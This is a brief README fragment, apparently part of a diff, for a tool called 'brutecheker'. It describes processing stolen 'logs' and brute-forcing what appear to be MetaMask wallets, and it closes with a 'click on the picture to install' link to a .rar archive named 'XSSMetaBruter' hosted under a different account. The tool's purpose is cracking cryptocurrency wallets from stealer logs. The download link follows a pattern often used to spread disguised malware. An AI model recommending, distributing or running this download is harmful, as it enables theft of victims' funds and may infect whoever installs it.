folcon92/brutecheker/README.md

 “check_virus": Removing exe files from the logs.
 “check_cloud": Checking for logs from the cloud.
 “delete_cloud": Deleting logs from the cloud.

-3. Drag and drop the logs folder into the console that opens and press Enter.
-4. Wait for the bruteforce to complete; the results will be saved in a txt file next to your bruteforcer exe file.
-5. CLICK ON THE PICTURE TO INSTALL

 [![image](https://github.com/user-attachments/assets/8e8e7d9c-c811-4121-b791-51090a03d458)](https://github.com/ethgenius/brutecheker/releases/download/brutemetamask/XSSMetaBruter.rar)